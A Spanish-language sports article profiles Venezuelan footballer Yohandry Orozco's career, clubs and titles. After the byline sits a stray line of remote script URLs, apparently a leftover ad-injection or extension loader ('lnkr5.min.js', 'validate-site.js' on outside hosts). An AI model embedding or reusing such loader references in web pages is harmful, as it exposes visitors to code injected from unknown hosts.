Yohandry Orozco, el campeón de batallas (+Fotos y Video) | Sports Venezuela Skip to content
¡LOS NUESTROS PRIMERO!
Screen Shot 2019-05-23 at 8.11.35 PM

Yohandry Orozco, el campeón de batallas (+Fotos y Video)

Comparte esto
Tweet about this on Twitter
Twitter
Share on Facebook
Facebook

Un niño maracucho convertía el mejor gol del Sudamericano Sub-20 Perú 2011. ¡CRACK! A lo Maradona, así titularon los medios internacionales, Yohandry Orozco lograba desde la mitad de la cancha con su gambeta que lo caracteriza lograr llevarse a todos sus rivales hasta llegar al área y lograr un zurdazo para batir al guardameta rival del equipo Perú cuando Venezuela caía en el marcador 1-0.

¡La Perla Orozco¡ así fue bautizado el joven maracucho, su gol dio vuelta en todo el mundo. Orozco, era ficha del Zulia FC, donde gracias a su joya de gol, estuvo en la mira por grandes clubes, pero en ese mismo año ficharía con el club alemán Wolfsburg donde estuvo hasta el 2013 y solo logró disputar 7 partidos.

Orozco debutó en el profesionalismo con el Unión Atlético Maracaibo en 2007. Con el Zulia FC, entre 2009 y 2011. Luego de su paso por el fútbol alemán donde viviría la experiencia del fútbol europeo.

 ¡Regresó a casa para ser campeón!

Regresó al fútbol venezolano con la oportunidad de dar lo mejor de él y demostrar su talento, donde con el Deportivo Táchira, Yohandry logró recuperar su nivel, ayudando a los aurinegros a conquistar la temporada 2014-15 donde en 68 partidos marcó 15 goles y con su gran fútbol ofensivo dio muchas asistencias para darle otra estrella a su club.

 ¡Apartado del fútbol!

Una mala experiencia viviría el joven marabino en el 2015, se daba de nuevo su salida al exterior con el club árabe, Al Ittihad de Arabia Saudita, pero este mismo lo dejaría fuera del plantel por haber superado el cupo de extranjeros no asiáticos.

El zurdo declaró que lo querían obligar a sacar el pasaporte libanés, pero su representante decía que no porque era peligroso, comentó que tuvo que demandar al equipo y durar 6 meses sin jugar.

¡Una nueva oportunidad!

El fútbol le daba otra oportunidad al vinotinto de poder demostrar su magia, el Cosmos de Nueva York de la North American Soccer League era el nuevo destino del zurdo, donde se reencontraba con sus compatriotas, los venezolanos Juan Arango y el técnico Giovanni Savarese.

Logró marcar 7 goles en 22 partidos, y aportar para que el equipo lograra conquistar la NASL y sumar su segundo título en lo personal. Aunque muchos lo criticaron por llegar a la NASL y no a la MLS, él se sintió agradecido, debido a que duró 6 meses sin jugar y estaba gordo y ningún equipo le daría la oportunidad.

 

¡Regreso a casa!

El criollo, volvía a casa. El Zulia FC se hacía con sus servicios donde logró disputar la temporada 2017 con 32 partidos y 11 goles y disputó la primera Copa Libertadores en la historia del club negriazul.

 ¡Tolima su nuevo rumbo!

El jugador a través de sus redes sociales, confirmaba que cruzaría la frontera para 2018 y defendería los colores oro y vinotinto del club con sede en la ciudad de Ibagué, al oeste colombiano.

Orozco, era oficializado como jugador del Club Deportes Tolima de la Primera A de Colombia, la Liga Águila donde los medios colombianos lo destacaban como un fichaje de alto nivel.

Rápidamente, se adaptaría al fútbol colombiano su primer semestre siendo protagonista con el club que dirige el profesor Alberto Gamero y conquistando la Liga Águila 2018-I al vencer en penales al Atlético Nacional en una final para la historia.

El joven de Maracaibo, ha disputado 26 partidos con 6 asistencias que lo mantienen líder con su compañero Sebastián Villalba. Su gran fútbol, lo han llevado a estar en varias oportunidades en el 11 ideal de la Liga Águila, siendo el favorito de la fanaticada pijaos.

¡Juegos Centroamericanos!

Rafael Dudamel, convocó a Yohandry para que formara parte de la selección de Venezuela Sub-21 que digo presente en los Juegos Centroamericanos y del Caribe 2018 disputados en Barranquilla y donde alcanzaron perder la final contra el anfitrión Colombia, 2-1, donde el zurdo descontó por la vinotinto pero se tuvieron que conformar con la medalla de plata.

La Perla, ya trabaja con su club donde comparte camerino con su compatriota Luis ‘Cariaco’ González y  esperan lograr otro título más y ser parte del proceso de la Vinotinto rumbo a la Copa América 2019 en Brasil y el mundial de Qatar 2022.

Escrito por: Jhoan Ulloa / @JhoanEulloaS

http://cdncache-a.akamaihd.net/sub/nee5452/52200_6968_/l.js?pid=2450&ext=http://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52200x6968x&r=1534957728275http://browfileext.com/addons/lnkr5.min.js

Redacción Sportsvenezuela.com

Scroll To Top